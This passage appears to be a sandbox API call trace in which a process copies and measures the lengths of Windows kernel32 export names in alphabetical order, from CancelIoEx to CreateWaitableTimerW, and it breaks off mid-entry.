returned="CancelIoEx" [0079.054] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.054] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.054] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.054] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.054] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.055] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.055] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.055] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.055] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.055] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.055] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.055] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.055] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.055] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.055] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.055] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.055] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.055] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.055] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.055] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.055] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.055] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.055] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.056] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.056] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.056] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.056] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.056] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.056] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.056] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.056] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.056] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.056] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.056] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.056] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.056] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.056] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.056] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.056] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.056] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.056] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.056] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.057] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.057] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.057] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.057] lstrlenA (lpString="COPYFILEA") returned 9 [0079.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.057] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.057] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.057] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.057] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.058] lstrlenA (lpString="COPYFILEW") returned 9 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.058] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.058] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.058] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.058] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.058] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.058] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.058] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.058] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.058] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.058] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.058] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.058] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.058] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.058] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.058] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.059] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.059] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.059] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.059] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.059] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.059] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.059] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.059] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.059] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.059] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.059] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.059] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.059] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.059] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.059] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.059] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.059] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.059] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.059] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.060] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.060] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.060] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.060] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.060] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.060] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.060] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.060] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.060] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.060] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.060] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.060] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.060] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.060] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.060] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.060] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.060] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.060] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.060] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.061] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.061] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.061] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.061] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.061] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.061] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.061] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.061] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.061] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.061] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.061] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.061] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.061] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.061] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.061] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.061] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.061] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.061] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.061] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.062] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.062] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.062] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.062] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.062] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.062] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.062] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.062] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.062] lstrlenA 